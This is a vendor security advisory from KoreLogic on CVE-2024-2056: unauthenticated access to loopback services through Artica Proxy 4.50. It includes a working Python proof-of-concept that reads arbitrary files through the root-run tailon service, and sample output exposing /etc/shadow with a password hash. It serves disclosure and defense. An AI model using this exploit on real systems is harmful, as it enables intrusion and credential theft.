Skip to main content
Security Advisory

Artica Proxy Loopback Services Remotely Accessible Unauthenticated

Advisory ID
KL-001-2024-004
CVE ID
CVE-2024-2056
Published
2024-03-05
Vendor
Artica

Affected Systems

Product
Artica Proxy
Version
4.50
Platform
Debian 10 LTS

Discovered By

Jim Becher, Jaggar Henry (KoreLogic)
Download (signed .txt)
Back to Advisories

Vulnerability Details

Affected Vendor: Artica
Affected Product: Artica Proxy
Affected Version: 4.50
Platform: Debian 10 LTS
CWE Classification: CWE-288: Authentication Bypass Using an Alternate Path or Channel, CWE-552: Files or Directories Accessible to External Parties
CVE ID: CVE-2024-2056

Vulnerability Description

Services that are running and bound to the loopback
interface on the Artica Proxy are accessible through
the proxy service. In particular, the "tailon" service is
running as the root user, is bound to the loopback interface,
and is listening on TCP port 7050. Security issues associated
with exposing this network service are documented at
https://github.com/gvalkov/tailon#security. Using the tailon
service, the contents of any file on the Artica Proxy can be
viewed.

Technical Description

root@artica-450:~# netstat -anop | grep LIST | egrep '127.0.|::' | awk '{ print $4 "   " $7 }'
127.0.0.1:57585         <PID>/(squid-1)
127.0.0.1:8562          <PID>/nginx:
127.0.0.1:884           <PID>/sshd
127.0.0.55:53           <PID>/dnscache
127.0.0.1:9143          <PID>/[authlog]
127.0.0.1:5432          <PID>/postgres
127.0.0.1:2521          <PID>/artica-smtpd
127.0.0.1:2874          <PID>/monit
127.0.0.1:19102         <PID>/[cache-tail]
127.0.0.1:3333          <PID>/go-shield-serv
127.0.0.1:389           <PID>/slapd
127.0.0.1:3334          <PID>/go-exec
127.0.0.1:7050          <PID>/tailon
:::4949                 <PID>/perl
:::9025                 <PID>/[error-page]
root@artica-450:~# ps -efww | grep tailon
root      2765     1  0 Nov07 ?        00:01:29 /sbin/tailon --allow-download --config /etc/tailon/config.toml alias=Syslog,group=System,/var/log/syslog alias=Daemons,group=Services,/var/log/*.log alias=Proxy,group=Service-Proxy,/var/log/squid/*.log alias=Nginx,group=Service-Web,/var/log/nginx/*.log

Mitigation and Remediation Recommendation

No response from vendor; no remediation available.

Credit

This vulnerability was discovered by Jim Becher and Jaggar Henry of KoreLogic, Inc.

Proof of Concept

$ python3 exploit.py 192.168.2.139 /etc/shadow
1701282189.746     35 192.168.2.99 TCP_TUNNEL/200 3496 CONNECT 0.0.0.0:7050 - HIER_DIRECT/0.0.0.0:7050 - mac=\\\"e0:d5:5e:0a:d3:24\\\" category:%200%0D%0Acategory-name:%20Unknown%0D%0Aclog:%20cinfo:0-Unknown;%0D%0A exterr=\\\"-|-\\\"
root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::
daemon:*:19507:0:99999:7:::
bin:*:19507:0:99999:7:::
sys:*:19507:0:99999:7:::
sync:*:19507:0:99999:7:::
games:*:19507:0:99999:7:::
man:*:19507:0:99999:7:::
...
...

exploit.py

import re
import sys
import json
import websocket

"""
run `pip install websocket-client` before executing.
"""

ARTICA_PROXY_IP = sys.argv[1] if len(sys.argv) >= 2 else '172.17.0.1'
FILE_TO_READ    = sys.argv[2] if len(sys.argv) >= 3 else  '/etc/passwd'
WEBSOCKET_URI   = 'ws://0.0.0.0:7050/tailon/ws/1337/korelogic/websocket'

payload = {
	'command': 'sed',
	'script':  f'r {FILE_TO_READ}',
	'entry': {
		'path':   '/var/log/squid/access.log',
		'alias':  'Proxy/access.log',
	},
	'nlines': 1
}

websocket_message = json.dumps([json.dumps(payload)])

ws = websocket.WebSocket()
ws.connect(WEBSOCKET_URI, http_proxy_host=ARTICA_PROXY_IP, http_proxy_port='8085', proxy_type='http')
ws.send(websocket_message)

reading = True
while reading:
	data = re.search(r'a\["\[\\"o\\",\\"(.*)\\"]"]$', ws.recv())
	if data: print(data.group(1))

ws.close()

The contents of this advisory are copyright(c) 2024 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Disclosure Timeline

KoreLogic requests vulnerability contact and secure communication method from Artica.

Artica Support issues automated ticket #1703011342 promising follow-up from a human.

KoreLogic again requests vulnerability contact and secure communication method from Artica.

KoreLogic mail daemon receives SMTP 554 5.7.1 from mail.articatech.com with response "Client host rejected: Go Away!"

KoreLogic requests vulnerability contact and secure communication method via https://www.articatech.com/ 'Contact Us' web form.

KoreLogic requests CVE from MITRE.

MITRE issues automated ticket #1591692 promising follow-up from a human.

30 business days have elapsed since KoreLogic attempted to contact the vendor.

KoreLogic requests update on CVE from MITRE.

KoreLogic requests update on CVE from MITRE.

KoreLogic reaches out to alternate CNA for CVE identifiers.

45 business days have elapsed since KoreLogic attempted to contact the vendor.

Vulnerability details presented to AHA! (takeonme.org) by proxy.

AHA! issues CVE-2024-2056 to track this vulnerability.

KoreLogic public disclosure.

Back to Advisories

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination
90+ day disclosure timeline
CVE coordination when applicable

Resources & Downloads

Contact Security Team
All Advisories Download signed .txt